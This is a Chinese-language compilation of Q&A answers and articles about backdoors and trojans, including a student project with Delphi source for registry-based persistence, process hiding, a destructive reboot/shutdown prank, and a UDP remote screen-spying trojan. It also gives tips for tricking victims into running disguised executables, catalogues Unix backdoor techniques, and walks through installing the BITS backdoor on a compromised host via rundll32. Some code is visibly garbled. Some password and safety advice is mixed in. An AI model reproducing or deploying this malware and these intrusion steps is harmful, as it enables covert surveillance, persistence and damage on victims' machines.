系統後門一般是指那些繞過安全性控制而獲取對程序或系統訪問權的程序方法。
創建過程:在軟體的開發階段,程序員常常會在軟體內創建後門程序以便可以修改程序設計中的缺陷。
利弊:使再次侵入被發現的可能性減至最低。但是,如果這些後門被其他人知道,或是在發布軟體之前沒有刪除後門程序,那麼它就成了安全風險,容易被黑客當成漏洞進行攻擊。
作用:使系統管理員無法阻止種植者再次進入系統:使種植者在系統中不易被發現:使種植者進入系統花最少時間。
(1)網路後門的設置方式有哪些擴展閱讀
早期的電腦黑客,在成功獲得遠程系統的控制權後,希望能有一種技術使得他們在任意的時間都可以再次進入遠程系統,於是後門程序就出現了。
後門程序跟我們通常所說的「木馬」有聯系也有區別。聯系在於,都是隱藏在用戶系統中向外發送信息,而且本身具有一定許可權,以便遠程機器對本機的控制;區別在於,木馬是一個非常完整的工具集合,而後門則體積較小且功能都很單一,所以木馬提供的功能遠遠超過後門程序。
② 如何用rmtsvc.exe設置網路後門
後門程序又稱特洛伊木馬,其用途在於潛伏在電腦中,從事搜集信息或便於黑客進入的動作。後程序和電腦病毒最大的差別,在於後門程序不一定有自我復制的動作,也就是後門程序不一定會「感染」其他電腦。
③ 電腦網路中的「後門」是什麼意思
電腦網路中的「後門」即是網路的漏洞
一、問題的提出
"The Internet is now more like an unlocked diary,with millions of consumers divulging marketable details of their personal lives,from where they live to what they eat for dinner."這是著名匿名伺服器站點Anonymizer上曾有過的一段話。是的,在不知不覺中,E時代已經到來,網路給我們的生活增添了絢麗與多彩。但是,在這五彩繽紛的世界下面,潛伏著一股黑潮暗流--黑客(HACKER)。這個名詞越來越引起世人的關注,而且影響越來越大,關於黑客事件的報道也越來越多。黑客是伴隨網路產生成長的,是指那些對電腦和網路有狂熱興趣的人,他們不斷的研究電腦和網路知識,發現電腦和網路中的漏洞,喜歡挑戰高難度的網路系統,千方百計的尋找網路中的大小漏洞,然後向網路管理員提出解決漏洞的建議。真正的黑客大多是賦有正義感的。他們不會惡意侵入他人系統,並且破壞系統程序和數據。但有一些人特別崇拜黑客,喜歡利用電腦網路四處搗亂,到處尋找黑客軟體,然後到處搞破壞,這類人應該是網路上最危險的傢伙。現在的媒體把這類人是黑客混為一談,"黑客"一詞也因此成了貶義詞。
現在的黑客軟體十分多,Back Orific、冰河、YAI到處都有。接觸網路後,我經常想:黑客軟體到底是如何編制的?我能編一個黑客軟體多好呀!這到不是想干壞事,因為在網路機房上課時,用一些黑客軟體可以作為控制工具來控制學員的機器(如:冰河)。可見黑客軟體本身不象病毒是個不好的東西,是可以用在正路上的。經過我的摸索,初步掌握了一些設計方法,主要是特洛伊木馬程序。本次畢業設計,我設計一個模擬黑客入侵程序,一個惡作劇程序,一個可以截獲網路上別人在機器上幹些什麼的程序,幾個程序純屬用於實驗,沒有什麼其它目的。在這里向各位老師匯報一下。程序設計的語言用的是PASCAL,用DELPHI 4進行編譯。
二、"特洛伊木馬"如何入侵系統
一個完整的"特洛伊木馬"一般分為兩個部分:一個是客戶服務程序(Client),用它來控制已經打開"後門"的機器;另一個是"後門"程序,用它來開放某台機器。假設我們想控制某台電腦,那麼我們通過一些手段來把"後門"程序傳到該電腦中並使其運行,這樣該電腦就變成了一台特殊的FTP伺服器。然後我們使用Client程序就可以控制該電腦了。當然,後門程序如果不運行也就無法發揮作用。因此,就要"誘騙"別人使用後門程序。如果是朋友或熟人,利用他們的信任讓他運行就行了;要是陌生人,可以在聊天室中和他們套近乎,一旦取得信任,把程序發給他們,誘騙其運行。當然,程序要隱蔽一些,例如可以把後門程序改名,變為README之類,或改變後綴,變成GIF、BMP等,當他們雙擊這些文件後就上了"賊船"了。也可以用WINZIP的把後門程序和一些東西製作成一個自解壓包,然後利用設定解壓後自動運行SETUP程序功能來運行指定的後門程序。總之,要利用一切手段使人家運行後門程序。
木馬程序運行後,會通過不同的方式修改系統,以便以後啟動系統後自動運行木馬。修改方法一般是通過修改注冊表:
Hkey_local_machine \Software\Microsoft\Windows\CurrentVersion\Run和
Hkey_local_machine\Software\Microsoft\Windows\CurrentVersion\RunServices中的項目是在系統開機時自動載入的,我們可以在這兩添加鍵值,達到自動啟動的目的。以下的這段代碼可以修改注冊表,並調用API函數判斷系統目錄,復制文件到其下,以實行入侵系統的目的:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls,registry;
type
TForm1 = class(TForm)
Button1: TButton;
Button2: TButton;
procere Button1Click(Sender: TObject);
procere Button2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.DFM}
procere TForm1.Button1Click(Sender: TObject);
var
regf:tregistry;
sysdir:pchar;
temp:string;
begin
getmem(sysdir,256);
getsystemdirectory(sysdir,128);
temp:=sysdir+'\client.exe';
freemem(sysdir,256);
regf:=tregistry.create;
regf.rootkey:=hkey_local_machine;
regf.openkey('software\microsoft\windows\currentversion\run',true);
regf.writestring(' ',temp);
regf.free;
file(pchar('hacker.exe'),pchar(temp),true);
end;
procere TForm1.Button2Click(Sender: TObject);
begin
close;
end;
end.
也有些高明的程序可以感染系統文件,附著在這些程序文件中,以達到其目的。我還沒有搞清楚這是怎樣辦到的。
在Windows中按下Ctrl+Alt+Del可以顯示當前運行的程序,這樣一來,我們的木馬程序不是要露餡了嗎?以下這段匯編代碼可以很方便的嵌入DELPHI或C++中,讓別人看不到你的程序,可以很好的隱藏:
asm
mov ebx,30h
push es
push fs
pop es
mov ebx,es:[ebx]
pop es
mov eax,10800000h
xchg [ebx+20h],eax
end;
為什麼這段匯編代碼可以隱藏程序呢?據資料分析:在WINDOWS 9X載入應用程序時,FS指向的段就是類似於DOS應用程序的PSP,裡面保存著一些有關應用程序重要數據,按下Ctrl+Alt+Del後,對於一個應用程序,若沒有可顯示的ENABLE窗口的名字,則系統要檢查上面程序段中的特定雙字是不是10800000h,如果是就不顯示這個應用程序的可執行文件的名字。
下面是一個惡作劇的程序,入侵計算機後,每次開機後,隨機出現滑鼠亂跑並發出怪叫、熱啟動、強行關機的現象,讓你無法進入WINDOWS 9X。對於一般的計算機用戶來說,因為找不出這個程序在何處,所以只能格式化系統區,重新安裝系統。
program hacker;
uses
windows;
var temp:integer;
begin
asm
mov ebx,30h
push es
push fs
pop es
mov ebx,es:[ebx]
pop es
mov eax,10800000h
xchg [ebx+20h],eax
end;
randomize;
temp:=random(3);
if temp=0 then
while(true) do
begin
messagebeep(0);
SetCursorPos (random(640),random(480));
end
else if temp=1 then
ExitWindowsEx(EWX_REBOOT,0)
else ExitWindowsEx(EWX_SHUTDOWN,0);
end.
有的木馬為了防止發現後被清除,在啟動時會產生一個備份,一般是感染WINDOWS的系統文件,當木馬被發現並清除後,備份會自動激活,使你依然處於遠程黑手的控制。比如當前國最盛行的"冰河",首先會修改注冊表的啟動項目,將自己復制兩份到系統中,分別為KERNEL32.EXE和SYSEXPLE.EXE,並且修改TXT文件的打開方式,一旦KERNEL32.EXE被刪除,那麼當打開一個TXT文件時,SYSEXPLE.EXE將再產生一個KERNEL32.EXE文件。
另外,有的木馬還能在運行後修改文件名,或者復制感染系統後,進行自我銷毀,使用戶很難進行查找。
三、木馬的種類
1、破壞型
惟一的功能就是破壞並且刪除文件,可以自動的刪除電腦上的DLL、INI、EXE文件。
2、密碼發送型
可以找到隱藏密碼並把它們發送到指定的信箱。有人喜歡把自己的各種密碼以文件的形式存放在計算機中,認為這樣方便;還有人喜歡用WINDOWS提供的密碼記憶功能,這樣就可以不必每次都輸入密碼了。許多黑客軟體可以尋找到這些文件,把它們送到黑客手中。也有些黑客軟體長期潛伏,記錄操作者的鍵盤操作,從中尋找有用的密碼。
在這里提醒一下,不要認為自己在文檔中加了密碼而把重要的保密文件存在公用計算機中,那你就大錯特錯了。別有用心的人完全可以用窮舉法暴力破譯你的密碼。利用WINDOWS API函數EnumWindows和EnumChildWindows對當前運行的所有程序的所有窗口(包括控制項)進行遍歷,通過窗口標題查找密碼輸入和出確認重新輸入窗口,通過按鈕標題查找我們應該單擊的按鈕,通過ES_PASSWORD查找我們需要鍵入的密碼窗口。向密碼輸入窗口發送WM_SETTEXT消息模擬輸入密碼,向按鈕窗口發送WM_COMMAND消息模擬單擊。在破解過程中,把密碼保存在一個文件中,以便在下一個序列的密碼再次進行窮舉或多部機器同時進行分工窮舉,直到找到密碼為止。此類程序在黑客網站上唾手可得,精通程序設計的人,完全可以自編一個。
3、遠程訪問型
最廣泛的是特洛伊馬,只需有人運行了服務端程序,如果客戶知道了服務端的IP地址,就可以實現遠程式控制制。以下的程序可以實現觀察"受害者"正在干什麼,當然這個程序完全可以用在正道上的,比如監視學生機的操作。
程序中用的UDP(User Datagram Protocol,用戶報文協議)是網際網路上廣泛採用的通信協議之一。與TCP協議不同,它是一種非連接的傳輸協議,沒有確認機制,可靠性不如TCP,但它的效率卻比TCP高,用於遠程屏幕監視還是比較適合的。它不區分伺服器端和客戶端,只區分發送端和接收端,編程上較為簡單,故選用了UDP協議。本程序中用了DELPHI提供的TNMUDP控制項。
受控機程序部分:
讓控制項CUDP監視受控機的1111埠,當有數據發送到該口時,觸發控制項CUDP的ONDATARECEIVED事件;REMOTEPORT屬性設為2222,當控制項CUDP發送數據時,將數據發送到主控機的2222口。
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
NMUDP, ComCtrls;
type
Tclient = class(TForm)
cudp: TNMUDP;
Animate1: TAnimate;
procere FormCreate(Sender: TObject);
procere FormDestroy(Sender: TObject);
procere cudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
private
{ Private declarations }
public
{ Public declarations }
end;
var
client: Tclient;
implementation
const bufsize=2048;//發送每一批數據的緩沖區大小
var
bmpstream:tmemorystream;
leftsize:longint;
{$R *.DFM}
procere screencap(leftpos,toppos,rightpos,bottompos:integer);
var
recwidth,recheight:integer;
sourcedc,destdc,bhandle:integer;
bitmap:Tbitmap;
begin
recwidth:=rightpos-leftpos;
recheight:=bottompos-toppos;
sourcedc:=createdc('display','','',nil);
destdc:=createcompatibledc(sourcedc);
bhandle:=createcompatiblebitmap(sourcedc,recwidth,recheight);
selectobject(destdc,bhandle);
bitblt(destdc,0,0,recwidth,recheight,sourcedc,leftpos,toppos,src);
bitmap:=tbitmap.Create;
bitmap.Handle:=bhandle;
bitmap.SaveToStream(bmpstream);
bmpstream.Position:=0;
leftsize:=bmpstream.Size;
bitmap.Free;
deletedc(destdc);
releasedc(bhandle,sourcedc);
end;
procere Tclient.FormCreate(Sender: TObject);
begin
bmpstream:=tmemorystream.create;
end;
procere Tclient.FormDestroy(Sender: TObject);
begin
bmpstream.free;
end;
procere Tclient.cudpDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var
ctrlcode:array[0..29] of char;
buf:array[0..bufsize-1] of char;
tmpstr:string;
sendsize,leftpos,toppos,rightpos,bottompos:integer;
begin
cudp.ReadBuffer(ctrlcode,numberbytes);//讀取控制碼
if ctrlcode[0]+ctrlcode[1]+ctrlcode[2]+ctrlcode[3]='show'
then
begin//控制碼前4位為"SHOW"表示主控機發出了截屏指令
if bmpstream.Size=0 then//沒有數據可發,必須截屏生成數據
begin tmpstr:=strpas(ctrlcode);
tmpstr:=(tmpstr,5,length(tmpstr)-4);
leftpos:=strtoint((tmpstr,1,pos(':',tmpstr)-1));
tmpstr:=(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));
toppos:=strtoint((tmpstr,1,pos(':',tmpstr)-1));
tmpstr:=(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));
rightpos:=strtoint((tmpstr,1,pos(':',tmpstr)-1));
bottompos:=strtoint((tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr)));
screencap(leftpos,toppos,rightpos,bottompos);//調用截屏函數
end;
if leftsize>bufsize then sendsize:=bufsize
else sendsize:=leftsize;
bmpstream.ReadBuffer(buf,sendsize);
leftsize:=leftsize-sendsize;
if leftsize=0 then bmpstream.Clear;
cudp.RemoteHost:=fromip;//FROMIP為主控機IP地址
cudp.SendBuffer(buf,sendsize);//將數據發到主控機的2222埠
end;
end;
end.
主控機程序部分:
讓控制項SUDP監視主控機的2222埠,當有數據發送到該口時,觸發SUDP的ONDATARECEIVED事件;REMOTEPORT屬性設為1111,當控制項SUDP發送數據時,將數據發到受控機的1111口。
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
ExtCtrls, StdCtrls, Buttons, NMUDP;
type
Tsever = class(TForm)
Edit1: TEdit;
Edit2: TEdit;
Label1: TLabel;
Label2: TLabel;
BitBtn1: TBitBtn;
Image1: TImage;
BitBtn2: TBitBtn;
sudp: TNMUDP;
procere BitBtn2Click(Sender: TObject);
procere FormCreate(Sender: TObject);
procere FormDestroy(Sender: TObject);
procere BitBtn1Click(Sender: TObject);
procere sudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
private
{ Private declarations }
public
{ Public declarations }
end;
var
sever: Tsever;
implementation
const bufsize=2048;
var
rsltstream,tmpstream:tmemorystream;
{$R *.DFM}
procere Tsever.BitBtn2Click(Sender: TObject);
begin
close;
end;
procere Tsever.FormCreate(Sender: TObject);
begin
rsltstream:=tmemorystream.create;
tmpstream:=tmemorystream.create;
end;
procere Tsever.FormDestroy(Sender: TObject);
begin
rsltstream.free;
tmpstream.free;
end;
procere Tsever.BitBtn1Click(Sender: TObject);
var
reqcode:array[0..29] of char;
reqcodestr:string;
begin
reqcodestr:='show'+edit1.text;
strp(reqcode,reqcodestr);
tmpstream.Clear;
rsltstream.Clear;
sudp.RemoteHost:=edit2.Text;
sudp.SendBuffer(reqcode,30);
end;
procere Tsever.sudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
var reqcode:array[0..29] of char;
reqcodestr:string;
begin
reqcodestr:='show'+edit1.text;
strp(reqcode,reqcodestr);
sudp.ReadStream(tmpstream);
rsltstream.CopyFrom(tmpstream,numberbytes);
if numberbytes<bufsize then
begin
rsltstream.Position:=0;
image1.Picture.Bitmap.LoadFromStream(rsltstream);
tmpstream.Clear;
rsltstream.Clear;
end
else
begin
tmpstream.Clear;
reqcode:='show';
sudp.RemoteHost:=edit2.Text;
sudp.SendBuffer(reqcode,30);
end;
end;
end.
四、如何預防黑客
黑客程序雖然破壞大,但不是不能防止的。
1、處理好你的密碼
我們一般是用賬號和密碼來上網的,密碼的設置無疑是十分講求技巧的,許多人的安全防範意識差,不注意密碼的設置,造成自己的賬號被盜用。如今的黑客軟體都是掛上密碼字典,然後用窮舉法進行破解,密碼太簡單,那麼破解的可能性就大了。以下是一些注意事項。
⑴ 密碼不可和賬號相同,這是最容易被猜到的了。
⑵ 經常更改密碼,拿到新賬號後要立即更改密碼,不要放久了。
⑶ 密碼最好多於8個字元,字元越長,破解難度越大。例如WORD文檔的密碼大於8位後,目前的破解軟體幾乎無法攻破。另外,最好在密碼中加入一些控制鍵,增加破譯難度。千萬不可用單一的字母或數字。
⑷ 有人喜歡用自己的生日、電話、身份證號碼等作為密碼,你不要這樣做。
⑸ 密碼盡量不要記顯眼的紙張上,更不能保存在計算機中,不要貪圖一時方便,用WINDOWS提供的保存密碼功能。
2、不要運行不明真相的程序
無論都高明的黑客程序,只要你不去運行它,就無法害到你。所以,不可相信網友的話,不要去運行他提供的程序;不要隨意去打開別人寄來的附件,無論他把附件中的圖片或影片吹得如何好看;要到大的、著名的網站去下載軟體,千萬不要到不明真象的個人網頁下載,因為在那兒你可能下載的病毒和黑客之手;如果你十分羨慕黑客,也請你不要下載所謂的黑客軟體,否則你沒害到別人,自己反被害了;如果你的機器上有防火牆,在上網時一定要打開,不要怕麻煩。
3、經常檢查系統信息
上網過程中,突然覺得計算機工作不對勁時,彷彿感覺有人在遙遠的地方遙控你。這時,你必須及時停止手中工作,運行"附件→系統工具→系統信息",在任務列表中尋找自己不熟悉的或者自己並沒有運行的程序,一旦找到程序後應立即終止它的運行,以防後患。
4、最好不去聊天室
我一直認為聊天室沒有什麼意思,特別對於計算機專業人員,聊天只是浪費時間和金錢,有些惡意的破壞者利用網上聊天室的漏洞干壞事,例如聊天室支持JAVA、HTML等功能,然而,這小小的JAVA也隱藏"殺機",他可以發給你一個足以讓你的機器當機的HTML語句。因為這些語句是不會在聊天室顯示出來的,所以你被暗算了可能還不知道。防治的辦法是在你的瀏覽器中關閉你的JAVA腳本。想聊天的,在公共機房聊聊算了,不能在自己的機器上聊天。
④ 什麼是"後門程序"
後門是一種登錄系統的方法,它不僅繞過系統已有的安全設置,而且還 能挫敗系統上各種增強的安全設置。
後門是一種登錄系統的方法,它不僅繞過系統已有的安全設置,而且還能挫敗系統上各種增強的安全設置。
後門包括從簡單到奇特,有很多的類型。簡單的後門可能只是建立一個新的賬號,或者接管一個很少使用的賬號;復雜的後門(包括木馬)可能會繞過系統的安全認證而對系統有安全存取權。例如一個login程序,你當輸入特定的密碼時,你就能以管理員的許可權來存取系統。
後門能相互關聯,而且這個 技術被許多黑客所使用。例如,黑客可能使用密碼破解一個或多個賬號密碼,黑客可能會建立一個或多個賬號。一個黑客可以存取這個系統,黑客可能使用一些 技術或利用系統的某個漏洞來提升許可權。黑客可能使用一些技術或利用系統的某個漏洞庭湖來提升許可權。黑客可能會對系統的配置文件進行小部分的修改,以降低系統的防衛性能。也可能會安裝一個木馬程序,使系統打開一個安全漏洞,以利於黑客完全掌握系統。
以上是在網路上常見的對「後門」的解釋,其實我們可以用很簡單的一句話來概括它:後門就是留在計算機系統中,供某位特殊使用都通過某種特殊方式控制計算機系統的途徑!——很顯然,掌握好後門技術是每個網路安全愛好者不可或缺的一項基本技能!它能讓你牢牢抓住肉雞,讓它永遠飛不出你的五指山!
下文將以筆者從事網路安全多年的工作經驗為基礎,給廣大的網路初級安全愛好者講解一些網路上常 用的後門的種類和使用方法以及技巧,希望大家能在最短的時間內學習到最好的技術,提升自己的網路安全技術水平!
後門的分類
後門可以按照很多方式來分類,標准不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮後門程序的分類方法:
1.網頁後門
此類後門程序一般都是伺服器上正常 的web服務來構造自己的連接方式,比如現在非常流行的asp、cgi腳本後門等。
2。線程插入後門
利用系統自身的某個服務或者線程,將後門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個後門技術。
3擴展後門
所謂的「擴展」,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於一個小的安全工具包,能實現非常多的常駐見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫郭後門「隱蔽」的初衷,具體看法就看各位使用都的喜好了。
4.c/s後門
和傳統的木馬程序類似的控制方法,採用「客記端/服務端」的控制方式,通過某種特定的訪問方式來啟動後門進而控制伺服器。
5.root kit
這個需要單獨說明,其實把它單獨列一個類在這里是不太恰當的,但是,root kit 的出現大大改變了後門程序的思維角度和使用理念,可以說一個好的root kit就是一個完全的系統殺手!後文我們講涉及到這方面,想念一定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,正向連接後門、反向連接後門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那麼多了,我們看重的,只是功能!
入侵法定————精品後門
⑤ 黑客中說的後門什麼意思
一般黑客都會在攻入系統後不只一次地進入該系統。為了下次再進入系統時方便一點,黑客會留下一個後門,特洛伊木馬就是後門的最好範例。Unix中留後門的方法有很多種,下面介紹幾種常見的後門,供網路管理員參考防範。
密碼破解後門
這是入侵者使用的最早也是最老的方法,它不僅可以獲得對Unix機器的訪問,而且可 以通過破解密碼製造後門。這就是破解口令薄弱的帳號。以後即使管理員封了入侵者的當前帳號,這些新的帳號仍然可能是重新侵入的後門。多數情況下,入侵者尋找口令薄弱的未使用帳號,然後將口令改的難些。當管理員尋找口令薄弱的帳號是,也不會發現這些密碼已修改的帳號。因而管理員很難確定查封哪個帳號。
Rhosts + + 後門
在連網的Unix機器中,象Rsh和Rlogin這樣的服務是基於rhosts文件里的主機名使用簡 單的認證方法。用戶可以輕易的改變設置而不需口令就能進入。入侵者只要向可以訪問的某用戶的rhosts文件中輸入"+ +",就可以允許任何人從任何地方無須口令便能進入這個帳號。特別當home目錄通過NFS向外共享時,入侵者更熱中於此。這些帳號也成 了入侵者再次侵入的後門。許多人更喜歡使用Rsh,因為它通常缺少日誌能力。許多管理員經常檢查 "+ +",所以入侵者實際上多設置來自網上的另一個帳號的主機名和用戶名,從而不易被發現。
校驗和及時間戳後門
早期,許多入侵者用自己的trojan程序替代二進制文件。系統管理員便依靠時間戳和系 統校驗和的程序辨別一個二進制文件是否已被改變,如Unix里的sum程序。入侵者又發展了使trojan文件和原文件時間戳同步的新技術。它是這樣實現的: 先將系統時鍾撥回到原文件時間,然後調整trojan文件的時間為系統時間。一旦二進制trojan文件與 原來的精確同步,就可以把系統時間設回當前時間。Sum程序是基於CRC校驗,很容易騙過。入侵者設計出了可以將trojan的校驗和調整到原文件的校驗和的程序。MD5是被 大多數人推薦的,MD5使用的演算法目前還沒人能騙過。
Login後門
在Unix里,login程序通常用來對telnet來的用戶進行口令驗證。 入侵者獲取login.c的原代碼並修改,使它在比較輸入口令與存儲口令時先檢查後門口令。如果用戶敲入後門 口令,它將忽視管理員設置的口令讓你長驅直入。這將允許入侵者進入任何帳號,甚至是root。由於後門口令是在用戶真實登錄並被日誌記錄到utmp和wtmp前產生一個訪問 的,所以入侵者可以登錄獲取shell卻不會暴露該帳號。管理員注意到這種後門後,便用"strings"命令搜索login程序以尋找文本信息。 許多情況下後門口令會原形畢露。入侵者就開始加密或者更好的隱藏口令,使strings命令失效。 所以更多的管理員是用MD5校驗和檢測這種後門的。
Telnetd後門
當用戶telnet到系統,監聽埠的inetd服務接受連接隨後遞給in.telnetd,由它運行 login.一些入侵者知道管理員會檢查login是否被修改,就著手修改in.telnetd. 在in.telnetd內部有一些對用戶信息的檢驗,比如用戶使用了何種終端。典型的終端 設置是Xterm或者VT100.入侵者可以做這樣的後門,當終端設置為"letmein"時產生一個不要任何驗證的shell. 入侵者已對某些服務作了後門,對來自特定源埠的連接產生一個shell。
服務後門
幾乎所有網路服務曾被入侵者作過後門。 Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本隨處多是。有的只是連接到某個TCP埠的shell,通過後門口令就能獲取訪問。這些程序有時用刺媧□?Ucp這樣不用的服務,或者被加入inetd.conf 作為一個新的服務,管理員應該非常注意那些服務正在運行,並用MD5對原服務程序做校驗。
Cronjob後門
Unix上的Cronjob可以按時間表調度特定程序的運行。入侵者可以加入後門shell程序使它在1AM到2AM之間運行,那麼每晚有一個小時可以獲得訪問。也可以查看cronjob中 經常運行的合法程序,同時置入後門。
庫後門
幾乎所有的UNIX系統使用共享庫,共享庫用於相同函數的重用而減少代碼長度。一些入侵者在象crypt.c和_crypt.c這些函數里作了後門;象login.c這樣的程序調用了 crypt()。當使用後門口令時產生一個shell。因此,即使管理員用MD5檢查login程序,仍然能產生一個後門函數,而且許多管理員並不會檢查庫是否被做了後門。對於許多入侵者來說有一個問題: 一些管理員對所有東西多作了MD5校驗,有一種辦法是入侵者對open()和文件訪問函數做後門。後門函數讀原文件但執行trojan後門程序。所以當MD5讀這些文件時,校驗和一切正常,但當系統運行時將執行trojan版本的,即使trojan庫本身也可躲過MD5校驗,對於管理員來說有一種方法可以找到後門,就是靜態編連MD5校驗程序然後運行,靜態連接程序不會使用trojan共享庫。
內核後門
內核是Unix工作的核心,用於庫躲過MD5校驗的方法同樣適用於內核級別,甚至連靜態 連接多不能識別。一個後門作的很好的內核是最難被管理員查找的,所幸的是內核的 後門程序還不是隨手可得,每人知道它事實上傳播有多廣。
文件系統後門
入侵者需要在伺服器上存儲他們的掠奪品或數據,並不能被管理員發現,入侵者的文章常是包括exploit腳本工具,後門集,sniffer日誌,email的備分,原代碼,等等!有時為了防止管理員發現這么大的文件,入侵者需要修補"ls","","fsck"以隱匿特定的目錄和文件,在很低的級別,入侵者做這樣的漏洞: 以專有的格式在硬碟上割出一部分,且表示為壞的扇區。因此入侵者只能用特別的工具訪問這些隱藏的文件,對於普通的管理員來說,很難發現這些"壞扇區"里的文件系統,而它又確實存在。
Boot塊後門
在PC世界裡,許多病毒藏匿與根區,而殺病毒軟體就是檢查根區是否被改變。Unix下,多數管理員沒有檢查根區的軟體,所以一些入侵者將一些後門留在根區。
隱匿進程後門
入侵者通常想隱匿他們運行的程序,這樣的程序一般是口令破解程序和監聽程序(sniffer),有許多辦法可以實現,這里是較通用的: 編寫程序時修改自己的argv[] 使它看起來象其他進程名。可以將sniffer程序改名類似in.syslog再執行,因此當管理員用"ps"檢查運行進程時,出現 的是標准服務名。可以修改庫函數致使"ps"不能顯示所有進程,可以將一個後門或程序嵌入中斷驅動程序使它不會在進程表顯現。使用這個技術的一個後門例子是
amod.tar.gz :
網路通行。這些網路通行後 門有時允許入侵者通過防火牆進行訪問。有許多網路後門程序允許入侵者建立某個埠號並不用通過普通服務就能實現訪問。 因為這是通過非標准網路埠的通行,管理員可能忽視入侵者的足跡。 這種後門通常使用TCP,UDP和ICMP,但也可能是其他類型報文。
TCP Shell 後門
入侵者可能在防火牆沒有阻塞的高位TCP埠建立這些TCP Shell後門. 許多情況下,他們用口令進行保護以免管理員連接上後立即看到是shell訪問。 管理員可以用netstat 命令查看當前的連接狀態,那些埠在偵聽,目前連接的來龍去脈。 通常這些後門可以讓入侵者躲過TCP Wrapper技術。這些後門可以放在SMTP埠,許多防火牆允許 e-mail通行的.
UDP Shell 後門
管理員經常注意TCP連接並觀察其怪異情況,而UDP Shell後門沒有這樣的連接,所以 netstat不能顯示入侵者的訪問痕跡,許多防火牆設置成允許類似DNS的UDP報文的通行,通常入侵者將UDP Shell放置在這個埠,允許穿越防火牆。
ICMP Shell 後門
Ping是通過發送和接受ICMP包檢測機器活動狀態的通用辦法之一。許多防火牆允許外界ping它內部的機器,入侵者可以放數據入Ping的ICMP包,在ping的機器間形成一個shell通道,管理員也許會注意到Ping包暴風,但除了他查看包內數據,否者入侵者不會暴露。
加密連接
管理員可能建立一個sniffer試圖某個訪問的數據,但當入侵者給網路通行後門加密 後,就不可能被判定兩台機器間的傳輸內容了。
⑥ 後門程序的分類
後門可以按照很多方式來分類,標准不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮後門程序的分類方法: 此類後門程序一般都是伺服器上正常 的web服務來構造自己的連接方式,比如非常流行的ASP、cgi腳本後門等。
網頁後門,網路上針對系統漏洞的攻擊事件漸漸少了,因為大家在認識到網路安全的重要性之後,最簡單卻又最有效的防護辦法:升級,都被大家所認同,所以系統漏洞在以後的歲月中存活的周期會越來越短,而從最近的趨勢來看,腳本漏洞已經漸漸取代了系統漏洞的地位,非常多的人開始研究起腳本漏洞來,sql注入也開始成為各大安全站點首要關注熱點,找到提升許可權的突破口,進而拿到伺服器的系統許可權。
asp、CGI、PHP這三個腳本大類在網路上的普遍運用帶來了腳本後門在這三方面的發展。
線程插入後門
利用系統自身的某個服務或者線程,將後門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個後門技術。
擴展後門
所謂的「擴展」,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於一個小的安全工具包,能實現非常多的常見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫離了後門「隱蔽」的初衷,具體看法就看各位使用者的喜好了。
c/s後門
和傳統的木馬程序類似的控制方法,採用「客戶端/服務端」的控制方式,通過某種特定的訪問方式來啟動後門進而控制伺服器。
root kit 6o f3H 3B
這個需要單獨說明,其實把它單獨列一個類在這里是不太恰當的,但是,root kit的出現大大改變了後門程序的思維角度和使用理念,可以說一個好的root kit就是一個完全的系統殺手!後文我們講涉及到這方面,一定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,正向連接後門、反向連接後門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那麼多了,我們看重的,只是功能! 首先我們來簡單解釋一下什麼是典型的線程插入後門:這種後門在運行時沒有進程,所有網路操作均播入到其他應用程序的進程中完成。也就是說,即使受控制端安裝的防火牆擁有「應用程序訪問許可權」的功能,也不能對這樣的後門進行有效的警告和攔截,也就使對方的防火牆形同虛設了!因為對它的查殺比較困難,這種後門本身的功能比較強大,是「居中家旅行、入侵攻擊」的必備品哦!
這類的典範就是國內提倡網路共享的小榕的BITS了,從它的推出以來,各類安全工具下載園地里BITS就高居榜首,非常多的朋友使用它的過程中感到了方便。類型:系統後門
使用范圍:wind200/xp/2003
隱蔽程序:★★★★☆
使用難度:★★★☆☆
查殺難度:★★★★☆
BITS其實是Background Intelligent Transfer Servicer的縮寫,可以在不知不覺中實現另一種意義的典型的線程插入後門,有以下特點:進程管理器中看不到;平時沒有埠,只是在系統中充當卧底的角色;提供正向連接和反向連接兩種功能;僅適合用於windows 200/xp/2003。
運用舉例
首先我們用3389登錄上肉雞,確定你有SYSTEM的許可權,將BITS.DLL拷貝到伺服器上,執行CMD命令: 4 #R Br A
rundll32.exebits.dll,install
這樣就激活了BIST,程序用這個特徵的字元來辨認使用者,也就相當於你的密碼了,然後卸載:rundll32.exe BITS.dll,Uninstall
